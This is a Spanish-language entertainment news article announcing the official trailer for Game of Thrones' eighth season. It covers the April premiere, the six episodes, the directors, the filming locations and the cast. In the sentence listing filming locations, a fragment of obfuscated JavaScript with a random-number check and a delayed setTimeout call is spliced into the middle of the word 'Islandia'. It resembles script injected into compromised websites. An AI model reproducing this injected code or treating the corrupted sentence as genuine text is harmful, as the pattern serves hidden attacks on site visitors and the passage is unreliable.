Ya está aquí el tráiler oficial de la temporada final de Game of Thrones

    Ya está aquí el tráiler oficial de la temporada final de Game of Thrones

    La octava temporada de Game of Thrones está compuesta por seis episodios que tendrán la más alta calidad cinematográfica.

    Autor: Redacción Maxim 5 marzo, 2019


    La octava temporada de Game of Thrones se estrena el próximo 14 de abril

     

     

    La serie inspirada en las novelas Canción de hielo y fuego de George R.R. Martin llegará a su fin este abril. Game of Thrones es una de las producciones más exitosas de la historia de la televisión y del streaming, basta mencionar que es la producción que ha ganado más premios Emy que cualquier otra serie (38), más los que se acumulen con su prometedora entrega final.

     

     

    via GIPHY

     

     

    El éxito detrás de GOT  se debe a distintos factores: se trata de una asombrosa producción de carácter medieval que nos muestra un mundo ficticio en el que siete reinos pugnan por apoderarse del trono de hierro, dentro de este contexto cualquiera que mire la serie tendrá algo que captará su atención. El sexo, la violencia, los dragones, el drama, el estupendo guión, la intriga política y la fantasía, son sólo algunos de los ingredientes que esta serie ha puesto sobre la mesa.

     

    via GIPHY

     

    La octava temporada está compuesta por seis episodios, los que, de  acuerdo con sus creadores, tendrán la más alta calidad cinematográfica. La dirección correrá a cargo de David Benioff, D.B. Weiss, David Nutter y Miguel Sapochnik, estos serán los responsables de llevar el titánico trabajo de producción con locaciones espectaculares en Islandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andia, Malta, Reino Unido, Marruecos, Croacia y España, a buen puerto.

     

     

    Al fin sabremos qué pasara en Westeros,  lo que sucederá  Sansa Stark (Sophie Turner), Cersei Lannister (Lena Headey), Daenerys Targaryen (Emilia Clarke), Jon Snow (Kit Harington), Tyrion Lannister (Peter Dinklage), Arya Stark (Maisie Williams), Jaime Lannister (Nikolaj Coster-Waldau); y el desenlace de la guerra contra los caminantes blancos.

     

     

     

     

     

     

     

     

    ¡Ya queremos verla!

     

    via GIPHY

     

     

    Temas relacionados con esta nota: , , , , , ,

La octava temporada de Game of Thrones está compuesta por seis episodios que tendrán la más alta calidad cinematográfica.